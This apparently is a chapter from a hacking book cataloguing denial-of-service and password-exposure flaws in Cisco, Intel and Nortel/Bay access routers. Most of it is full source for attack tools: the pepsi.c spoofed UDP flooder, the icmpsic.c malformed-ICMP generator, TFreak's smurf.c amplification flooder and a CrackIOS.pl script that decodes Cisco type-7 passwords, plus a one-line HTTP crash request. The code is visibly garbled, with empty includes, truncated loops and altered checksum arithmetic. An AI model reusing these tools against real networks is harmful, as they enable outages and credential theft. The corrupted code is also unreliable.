Cisco

At the top of the access router market, Cisco (www.cisco.com) is a worldwide internetworking leader offering lines of modular, multiservice access platforms for small, medium, and large offices and ISPs. Cisco is a product vendor in approximately 115 countries, which are served by a direct sales force, distributors, value-added resellers, and system integrators. Cisco also hosts one of the Internet's largest e-commerce sites with 90 percent of overall order transactions. These access products provide solutions for data, voice, video, dial-in access, VPNs, and multiprotocol LAN-to-LAN routing. With high-performance, modular architectures, Cisco has integrated the functionality of several devices into a single, secure, manageable solution.



Liabilities

General Denial-of-Service Attacks

Synopsis: There is a DoS vulnerability in Cisco family access products. Hack State: Unauthorized access and/or system crash. Vulnerabilities: The following:

AS5200, AS5300 and AS5800 series access servers

7200 and 7500 series routers

ubr7200 series cable routers

7100 series routers

3660 series routers

4000 and 2500 series routers

SC3640 System Controllers

AS5800 series Voice Gateway products

AccessPath LS-3, TS-3, and VS-3 Access Solutions products

Breach: Consistent scanning while asserting the telnet ENVIRON option before the router is ready to accept it causes a system crash. Also, sending packets to the router's syslog port (UDP port 514) will cause some of these systems to crash as well. Common DoS attacks frequently encountered are TCP SYN floods and UDP floods, aimed at diagnostic ports. As described earlier, TCP SYN attacks consist of a large number of spoofed TCP connection setup messages aimed at a particular service on a host. Keep in mind that older TCP implementations cannot handle many imposter packets, and will not allow access to the victim service. The most common form of UDP flooding is an attack consisting of a large number of spoofed UDP packets aimed at diagnostic ports on network devices. This attack is also known as the Soldier pepsi.c attack, shown next and in Figure 9.4.



Pepsi.c



#define FRIEND "My christmas present to the Internet -Soldier"

#define VERSION "Pepsi.c v1.7"

#define DSTPORT 7

#define SRCPORT 19

#define PSIZE 1024

#define DWAIT 1





* Includes

*/

#include

#include

#include

#include

#include

#include

#include

#include
#include #include #include #include #include #include #include #include #include #include #include /*

Banner.

*/

void banner() {

printf( "\t\t\t%s Author - Soldier \n", VERSION ); printf( "\t\t\t [10.27.97] \n\n" ); printf( "This Copy Register to: %s\n\n", FRIEND );

}

/*

Option parsing.

*/

struct sockaddr_in dstaddr; unsigned long dst; struct udphdr *udp; struct ip *ip; char *target; char *srchost; int dstport = 0; int srcport = 0; int numpacks = 0; int psize = 0; int wait = 0; void usage(char *pname)

{

printf( "Usage:\n " );

printf( "%s [-s src] [-n num] [-p size] [-d port] [-o port] [-w wait]

\n\n", pname );

printf( "\t-s : source where packets are coming from\n" );



printf( "\t-n : number of UDP packets to send\n" ); printf( "\t-p : Packet size [Default is 1024]\n" ); printf( "\t-d : Destination port [Default is %.2d]\n",

DSTPORT );

printf( "\t-o : Source port [Default is %.2d]\n",

SRCPORT ); printf( "\t-

w : Wait time between pkts [Default is 1]\n" ); printf( "\t : Destination\n" );

printf( "\n" ); exit(EXIT_SUCCESS);

* Checksum code, Soldier's original stuff.

*/

unsigned short in_cksum(u_short *addr, int len)

{

register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1 ) {

sum += *w++; sum += *w++; nleft -= 2;

}



if (nleft == 1)

{

*(u_char *)(&answer) = *(u_char *)w; sum += answer;

}

sum = (sum >> 17) + (sum & 0xffff); sum += (sum >> 17); answer = -sum; return (answer);

}

void main(int argc, char *argv[])

{

int sen; int i;

int unlim = 0; int sec_check; int opt; char *packet;

struct hostent *host = NULL; unsigned long a;

/*

* Display the banner to begin with.

*/



banner();

/*

* Debugging options.

*/

openlog( "PEPSI", 0, LOG_LOCAL5 ); if (argc < 2)

usage(argv[0]); while ((opt = getopt(argc, argv, "s:d:n:p:w:o:")) != EOF)

{

switch(opt) {

case 's':

srchost = (char *)malloc(strlen(optarg) + 1); strcpy(srchost, optarg);

break; case 'd':

dstport = atoi(optarg);

break; case 'n':

numpacks = atoi(optarg);

break; case 'p':

psize = atoi(optarg);

break; case 'w':

wait = atoi(optarg);

break; case 'o':

srcport = atoi(optarg);

break; default:

usage(argv[0]);

break;

if (!dstport)

dstport = DSTPORT;

if (!srcport)

srcport = SRCPORT; if (!psize)

psize = PSIZE;

if (!argv[optind])

puts( "[*] Specify a target host, doof!" ); exit(EXIT_FAILURE);



}

target = (char *)malloc(strlen(argv[optind])); if (!target) {

puts( "[*] Agh! Out of memory!" ); perror( "malloc" );

exit(EXIT_FAILURE);

}

strcpy(target, argv[optind]);

}

memset(&dstaddr, 0, sizeof(struct sockaddr_in)); dstaddr.sin_family = AF_INET;

dstaddr.sin_addr.s_addr = inet_addr(target); if (dstaddr.sin_addr.s_addr == -1) {

host = gethostbyname(target);

if (host == NULL)

printf( "[*] Unable to resolve %s\t\n", target ); exit(EXIT_FAILURE);

}

dstaddr.sin_family = host->h_addrtype;

memcpy((caddr_t) &dstaddr.sin_addr, host->h_addr, host->h_length);

~ }

memcpy(&dst, (char *)&dstaddr.sin_addr.s_addr, 4); printf( "# Target Host : %s\n", target ); printf( "# Source Host : %s\n",

(srchost && *srchost) ? srchost : "Random" ); if (!numpacks)

printf( "# Number : Unlimited\n" ); else

printf( "# Number : %d\n", numpacks ); printf( "# Packet Size : %d\n", psize ); printf( "# Wait Time : %d\n", wait ); printf( "# Dest Port : %d\n", dstport ); printf( "# Source Port : %d\n", srcport ); /*

* Open a socket. */

sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);



packet = (char *)malloc(sizeof(struct ip *) + sizeof(struct udphd r *) +

psize); ip = (struct ip *)packet;

udp = (struct udphdr *)(packet + sizeof(struct ip)); memset(packet, 0, sizeof(struct ip) + sizeof(struct udphdr) + psi ze);

if (!numpacks)



{

unlim++; numpacks++;

}

if (srchost && *srchost) {

if (!(host = gethostbyname(srchost))) {

printf( "[*] Unable to resolve %s\t\n", srchost ); syslog( LOG_NOTICE, "Unable to resolve [%s]", srchost );

exit(EXIT_FAILURE);

}

else {

ip->ip_src.s_addr = ((unsigned long)host->h_addr); syslog( LOG_NOTICE, "IP source is [%s]", host->h_name );

}

}

ip->ip_dst.s_addr = dst;

ip->ip_v = 4; ip->ip_hl = 5; ip->ip_ttl = 255; ip->ip_p = IPPROTO_UDP;

ip-

>ip_len = htons(sizeof(struct ip) + sizeof(struct udphdr) + psize); ip->ip_sum = in_cksum(ip, sizeof(struct ip)); udp->uh_sport = htons(srcport); udp->uh_dport = htons(dstport);

udp->uh_ulen = htons(sizeof(struct udphdr) + psize); for (i=0; i
if (!srchost)

{

ip->ip_src.s_addr = ((unsigned long)rand()); syslog( LOG_NOTICE, "IP source set randomly." );





if (sendto(sen, packet, sizeof(struct ip) + sizeof(struct udp

hdr) +

psize, 0, (struct sockaddr *)&dstaddr, sizeof(struct sockaddr_in)) == (-1))

{

puts( "[*] Error sending packet." ); perror( "Sendpacket" );

exit(EXIT_FAILURE);

}

usleep(wait);

}

syslog( LOG_NOTICE, "Sent %d packets to [%s]", numpacks, target )

f

}



HTTP DoS Attack



Synopsis: There is an HTTP DoS vulnerability in Cisco family access products.



Hack State: Unauthorized access and/or system crash.



Vulnerabilities: Access routers.



Breach: Cisco routers have a built-in feature that allows administrators to monitor them remotely. When this feature is enabled, it is possible to cause an HTTP DoS attack against the router by issuing a simple request. This request will cause the router to stop responding until the unit is reset:



http:///%%



IOS Password Cracker

Synopsis: There is potential exposure of Cisco internetworking operating system (IOS) passwords. Hack State: Password crack.

Vulnerabilities: Access routers.

Breach: CrackIOS.pl CrackIOS.pl

@xlat = ( 0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44, 0x48, 0x53 , 0x55, 0x42 );



while (<>) {

if (/(password|md5)\s + 7\s+([\da-f]+)/io) { if (!(length($2) & 1)) { $ep = $2; $dp = ""; ($s, $e) = ($2 =~ /A(..)(. + )/o);

for ($i = 0; $i < length($e); $i+=2) {

$dp .= sprintf "%c",hex(substr($e,$i,2))A$xlat[$s++]; }

s/$ep/$dp/;

}

}

print;

}

# eof



NAT Attack



Synopsis: Bugs in IOS software cause packet leakage between network address translation (NAT) and input access filters.

Hack State: Packet leakage.

Vulnerabilities: The following:

Cisco routers in the 17xx family.

Cisco routers in the 26xx family.

Cisco routers in the 36xx family.

Cisco routers in the AS58xx family (not the AS52xx or AS53xx).

Cisco routers in the 72xx family (including the ubr72xx).

Cisco routers in the RSP70xx family (not non-RSP 70xx routers).

Cisco routers in the 75xx family.

The Catalyst 5xxx Route-Switch Module (RSM).



Breach: Software bugs create a security breach between NAT and input access list processing in certain Cisco routers running 12.0-based versions of Cisco IOS software (including 12.0, 12.0S, and 12.0T, in all versions up to 12.04). This causes input access list filters to ''leak" packets in certain NAT configurations.



UDP Scan Attack



Synopsis: Performing a UDP scan on Port 514 causes a system crash on some routers running IOS software version 12.0.



Hack State: System crash.

Vulnerabilities: IOS 4000 Software (C4000-IK2S-M), Version 12.0(2)T, and IOS 2500 Software (C2500-IOS56I-L), Version 12.0(2).



Breach: Performing a UDP scan on UDP port 514 causes a system crash on some routers running IOS software version 12.0. As part of the internal logging system, port 514 (remote accessibility through front-end protection barriers) is an open invitation to various types of DoS attacks. Confirmed crashes have been reported using nmap (/www.insecure.org) UDP port scan modules.



Intel



Intel (www.intel.com) was founded when Robert Noyce and Gordon Moore left Fairchild Semiconductor in the late 1960s to create a new startup. Developing state-of-the-art microprocessors, the company grew to a global giant that currently employs more than 70,000 people in more than 40 nations worldwide. More recently, Intel entered the access router market, offering Express router connectivity for branch offices and smaller central sites. This product line provides easy Internet access, flexible configuration options, remote management, and security. These routers are specialized for efficient IP/IPX traffic, and include traffic control with features such as IPX/SPX spoofing and packet filtering.



Liabilities



Denial-of-Service Attack



Synopsis: Reports indicate that the Intel Express routers are vulnerable to remote ICMP fragmented and oversize ICMP packet analyses.



Hack State: Unauthorized access and/or system crash.



Vulnerabilities: Intel Express routers



Breach: The Intel Express router family is vulnerable to remote ICMP fragmented and oversized ICMP packet attacks. In both cases, this breach can be executed remotely; and since ICMP packets are normally allowed to reach the router, this vulnerability is especially dangerous. As example source code, see icmpsic.c, part of ISIC by hacker guru Mike Frantzen.

icmpsic.c

to change than the bytes IIR

#include "isic.h"

/* This is tuned for Ethernet-sized frames (1500 bytes)

For user over a modem or frame (or other) you will have

the

'rand() & 0x4ff' line below. The 0x4ff needs to be less

size

of the frame size minus the length of the IP header (20

C)

minus the length of the TCP header.







/* Variables shared between main and the signal handler so we can * display output if ctrl-c'd

*/ u_int seed = 0;

u_long acx = 0;

struct timeval starttime;

u_long datapushed = 0;



/* We want a random function that returns 0 to 0x7fff */

#if ( RAND_MAX != 2147483647 ) /* expect signed long */

# error Random IP generation broken: unexpected RAND_MAX.

#endif



int

main(int argc, char **argv) {

int sock, c;

u_char *buf = NULL;

u_short *payload = NULL;







u_int payload_s = 0; int packet_len = 0;

struct ip *ip_hdr = NULL; struct icmp *icmp = NULL; u_short *ip_opts = NULL;

/* Packet Variables */

u_long src_ip = 0, dst_ip = 0;

u_char tos, ttl, ver;

u_int id, frag_off;

u_int ipopt_len;





/* Functionality Variables */ int src_ip_rand = 0, dst_ip_rand = 0; struct timeval tv, tv2; float sec;

unsigned int cx = 0;

u_long max_pushed = 10240; /* 10MB/sec */

u_long num_to_send = 0xffffffff; /* Send 4billion packets */

u_long skip = 0; int printout = 0;



/* Defaults */ float FragPct = 30; float BadIPVer = 10;

float IPOpts = 50;

float ICMPCksm = 10;





/* Not crypto strong randomness but we don't really care. And this



* gives us a way to determine the seed while the program is running *

* if we need to repeat the results



while((c = getopt(argc, argv, "hd:s:r:m:k:Dp:V:F:I:i:vx:")) != EOF)

{

switch (c) { case 'h': usage(argv[0]);

exit(0);

break; case 'd':

if ( strcmp(optarg, "rand") == 0 ) {

printf("Using random dest IP's \n");

dst_ip = 1; /* Just to pass sanity checks */

dst_ip_rand = 1;

break;

}

if (!(dst_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad dest IP\n");



exit( -1 );

}

break; case 's':

if ( strcmp(optarg, "rand") == 0 ) { printf("Using random source IP's\n"); src_ip = 1; /* Just to pass sanity checks */ src_ip_rand = 1; break;

}

if (!(src_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad source IP\n"); exit( -1 );

}

break; case 'r':

seed = atoi(optarg);

break;

case 'm':

max_pushed = atol(optarg);

break;

case 'k':

skip = atol(optarg);

printf("Will not transmit first %li packets.\n", skip);

break;

case 'D':

printout++;

break;

case 'p':

num_to_send = atoi(optarg);

break;

case 'V':

BadIPVer = atof(optarg);

break;

case 'F':

FragPct = atof(optarg); break; case 'I':

IPOpts = atof(optarg); break; case 'i':

ICMPCksm = atof(optarg); break; case 'x':

repeat = atoi(optarg); break; case 'v':

printf("Version %s\n", VERSION);



exit(0);

} }

if ( !src_ip || !dst_ip ) { usage(argv[0]); exit(EXIT_FAILURE);

}



printf("Compiled against Libnet %s\n", LIBNET_VERSION); printf("Installing Signal Handlers.\n");

if ( signal(SIGTERM, &sighandler) == SIG_ERR ) printf("Failed to install signal handler for SIGTERM\n"); if ( signal(SIGINT, &sighandler) == SIG_ERR ) printf("Failed to install signal handler for SIGINT\n"); if ( signal(SIGQUIT, &sighandler) == SIG_ERR ) printf("Failed to install signal handler for SIGQUIT\n");



printf("Seeding with %i\n", seed); srand(seed); max_pushed *= 1024;



if ( (buf = malloc(IP_MAXPACKET)) == NULL ) {

perror("malloc: "); exit( -1 );

}

if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) { perror("socket: ");

exit(EXIT_FAILURE);

}

if ( max_pushed >= 10000000 )

printf("No Maximum traffic limiter\n");

else printf("Maximum traffic rate = %.2f k/s\n", max_pushed/1024.0

);



printf("Bad IP Version\t= %.0f%% \t\t", BadIPVer); printf("IP Opts Pcnt\t= %.0f%%\n", IPOpts);

printf("Frag'd Pcnt\t= %.0f%%\t\t", FragPct); printf("Bad ICMP Cksm\t= %.0f%%\n", ICMPCksm);

printf( "\n");



/* Drop them down to floats so we can multiply and not overflow */

BadIPVer /= 100;

FragPct /= 100;

IPOpts /= 100; ICMPCksm /= 100;

/*************

* Main Loop *

*************/

gettimeofday(&tv, NULL); gettimeofday(&starttime, NULL);



for(acx = 0; acx < num_to_send; acx++) { packet_len = IP_H + 4;



tos = rand() & 0xff; id= acx & 0xffff;

ttl = rand() & 0xff;



if ( rand() <= (RAND_MAX * FragPct) ) frag_off = rand() & 0xffff; else frag_off = 0;



/* We're not going to pad IP Options */

if ( rand() <= (RAND_MAX * IPOpts) ) { ipopt_len = 10 * (rand() / (float) RAND_MAX);

ipopt_len = ipopt_len << 1; ip_opts = (u_short *) (buf + IP_H); packet_len += ipopt_len << 1;



for ( cx = 0; cx < ipopt_len; cx++ ) ip_opts[cx] = rand() & 0xffff;

icmp = (struct icmp *)(buf + IP_H +(ipopt_len << 1)); ipopt_len = ipopt_len >> 1; } else { ipopt_len = 0;

icmp = (struct icmp *) (buf + IP_H);

}



if ( src_ip_rand == 1 )

src_ip = ((rand() & 0xffff) << 15) + (rand() & 0xffff);

if ( dst_ip_rand == 1 )

dst_ip = ((rand() & 0xffff) << 15) + (rand() & 0xffff);



if ( rand() <= (RAND_MAX * BadIPVer ) )

ver = rand() & 0xf; else ver = 4;



payload_s = rand() & 0x4ff; /* length of 1279 */

packet_len += payload_s;


if ( rand() <= (RAND_MAX * ICMPCksm) )

icmp->icmp_cksum = rand() & 0xffff;

else libnet_do_checksum(buf, IPPROTO_ICMP, 4 + payload_s); if ( printout ) {

printf("%s ->",

inet_ntoa(*((struct in_addr*) &src_ip )));

printf( " %s tos[%i] id[%i] ver[%i] frag[%i]\n",

inet_ntoa(*((struct in_addr*) &dst_ip )),

tos, id, ver, frag_off);

}

if ( skip <= acx ) {

for ( cx = 0; cx < repeat; cx++ ) {

c = libnet_write_ip(sock, buf, packet_len);

datapushed+=c;

}

if (c != (packet_len) ) { perror("Failed to send packet");



}

if ( !(acx % 1000) ) { if ( acx == 0 )

continue;

gettimeofday(&tv2, NULL);

sec = (tv2.tv_sec - tv.tv_sec)

- (tv.tv_usec - tv2.tv_usec) / 1000000.0;

printf(" %li @ %.1f pkts/sec and %.1f k/s\n", acx,

1000/sec, (datapushed / 1024.0) / sec);

datapushed=0;

gettimeofday(&tv, NULL);

}

/* Flood protection */ gettimeofday(&tv2, NULL); sec = (tv2.tv_sec - tv.tv_sec) - (tv.tv_usec - tv2.tv_usec) / 1000000.0; if ( (datapushed / sec) >= max_pushed ) usleep(10); /* 10 should give up our timeslice */

}

gettimeofday(&tv, NULL);

printf("\nWrote %li packets in %.2fs @ %.2f pkts/s \n", acx, (tv.tv_sec-starttime.tv_sec)

+ (tv.tv_usec-starttime.tv_usec) / 1000000.0,

acx / ((tv.tv_sec-starttime.tv_sec)

+ (tv.tv_usec-starttime.tv_usec)/1000000.0) );

free(buf); return ( 0 );

}

void usage(u_char *name) {

fprintf(stderr,

"usage: %s [-v] [-D] -s [,port] -d [,port] \n"

" [-r seed] [-m ] \n"

" [-p ] [-k ] [-

x ]\n"

"\n"

" Percentage Opts: [-F frags] [-V ] [-
I ]\n"

" [-i ]\n" "\n"

" [-D] causes packet info to be printed out -- DEBUGGING\n\n"

" ex: -s 10.10.10.10,23 -d 10.10.10.100 -I 100\n"

" will give a 100%% chance of IP Options A^\n"

" ex: -s 10.10.10.10,23 -d 10.10.10.100 -p 100 -r 103334\n"

" ex: -s rand -d rand,1234 -r 23342\n"

" aaaa causes random source addr\n"

" ex: -s rand -d rand -k 10000 -p 10001 -r 666\n"

this is especially useful if you suspect that packe causing a problem with the target stack.\n\n",



((char *) rindex(name, '/')) == ((char *) NULL) ? (char *) name

: (char *) rindex(name, '/') + 1);

}



void sighandler(int sig)

{

struct timeval tv; gettimeofday(&tv, NULL);



printf("\n");

printf("Caught signal %i\n", sig); printf("Used random seed %i\n", seed);

printf("Wrote %li packets in %.2fs @ %.2f pkts/s\n", acx, (tv.tv_sec - starttime.tv_sec)

+ (tv.tv_usec - starttime.tv_usec)/1000000.0,

acx / (( tv.tv_sec - starttime.tv_sec)

+ (tv.tv_usec - starttime.tv_usec)/1000000.0)

);



fflush(stdout);

exit(0);

}



Nortel/Bay



Nortel Networks (www.nortelnetworks.com) is a global leader in access communications such as telephony, data, and wireless. Nortel has offices and facilities in Canada, Europe, Asia-Pacific, the Caribbean, Latin America, the Middle East, Africa, and the United States. Contending with Cabletron and Cisco, Nortel offers access routers that direct communication traffic across LANs and WANs, including multiservice platforms, extranet, and voice/data platforms. Although targeting medium and large offices and ISPs, Nortel offers access gateways for small office and home users as well. Nortel's claim to fame stems from its products' high-functional density, feature-rich modularity, and security flexibility.



Liabilities

Flooding

Synopsis: Nortel/Bay Access routers are particularly vulnerable to ICMP echo request flooding. Hack State: Severe network congestion via broadcast storms. Vulnerabilities: LAN and WAN access gateways.

Breach: The smurf attack is another network-level flooding attack against access routers. With smurf, a hacker sends excessive ICMP echo (PING) traffic at IP broadcast addresses, with a spoofed source address of a victim. There are, on a large broadcast network segment, potentially hundreds of machines to reply to each packet, causing a multitude of broadcast storms, thus flooding the network. During a broadcast storm, messages traverse the network, resulting in responses to these messages, then responses to responses, in a blizzard effect. These storms cause severe network congestion that can take down the most resilient internetworking hardware. The smurf.c program by renowned hacker TFreak, instigates broadcast storms by spoofing ICMP packets from a host, sent to various broadcast addresses, which generate compounded replies to that host from each packet.



Smurf.c



#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include



void banner(void); void usage(char *);

void smurf(int, struct sockaddr_in, u_long, int); void ctrlc(int);

unsigned short in_chksum(u_short *, int); /* stamp */

char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $





int main (int argc, char *argv[])

{

struct sockaddr_in sin; struct hostent *he; FILE *bcastfile;

int i, sock, bcast, delay, num, pktsize, cycle = 0, x; char buf[32], **bcastaddr = malloc(8192);



banner();



signal(SIGINT, ctrlc);



if (argc < 6) usage(argv[0]);



if ((he = gethostbyname(argv[1])) == NULL) { perror("resolving source host"); exit(-1);

}

memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(0);



num = atoi(argv[3]); delay = atoi(argv[4]); pktsize = atoi(argv[5]);

if ((bcastfile = fopen(argv[2], "r")) == NULL) { perror("opening bcast file"); exit(-1);

}

x = 0;

while (!feof(bcastfile)) { fgets(buf, 32, bcastfile);

if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;

for (i = 0; i < strlen(buf); i++)

if (buf[i] == '\n') buf[i] = '\0'; bcastaddr[x] = malloc(32); strcpy(bcastaddr[x], buf); x++;

}

bcastaddr[x] = 0x0; fclose(bcastfile);



if (x == 0) {

fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);

exit(-1);

}

if (pktsize > 1024) {

fprintf(stderr, "ERROR: packet size must be < 1024\n\n"); exit(-1);

}

if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("getting socket"); exit(-1);

}

setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeo f(bcast));



printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);



for (i = 0; i < num || !num; i++) {

if % 25)) { printf("."); fflush(stdout); }

smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize); cycle++;

if (bcastaddr[cycle] == 0x0) cycle = 0; usleep(delay);

}

puts("\n\n");

return 0;

}



void banner (void)

{

puts("\nsmurf.c v4.0 by TFreak\n");

void usage (char *prog) {

fprintf(stderr, "usage: %s "

" \n\n"
"target = address to hit\n"

"bcast file = file to read broadcast addresse

"num packets = number of packets to send (0 = "packet delay = wait between each packet (in ms "packet size = size of packet (< 1024)\n\n", p

from\n"

flood)\n" )\n"

rog);

exit(-1);

}



void smurf (int sock, struct sockaddr_in sin, u_long dest, int psiz

e) {

struct iphdr *ip; struct icmphdr *icmp; char *packet;

packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);

ip = (struct iphdr *)packet;

icmp = (struct icmphdr *) (packet + sizeof(struct iphdr)); memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr)

+

psize);



ip-

>tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip->ihl = 5; ip->version = 4;

ip->ttl = 255;

ip->tos = 0; ip->frag_off = 0; ip->protocol = IPPROTO_ICMP; ip->saddr = sin.sin_addr.s_addr; ip->daddr = dest;

ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr)); icmp->type = 8; icmp ->code = 0; icmp -

>checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);



sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphd r) + psize,

0, (struct sockaddr *)&sin, sizeof(struct sockaddr));
free(packet); /* free willy! */

void ctrlc (int ignored)

{

puts("\nDone!\n"); exit(1);

}

unsigned short in_chksum (u_short *addr, int len)

{

register int nleft = len; register int sum = 0; u_short answer = 0;

while (nleft > 1) {

sum += *addr++;

nleft -= 2;

}

if (nleft == 1) {

*(u_char *)(&answer) = *(u_char *)addr; sum += answer;

}

sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return(answer);

}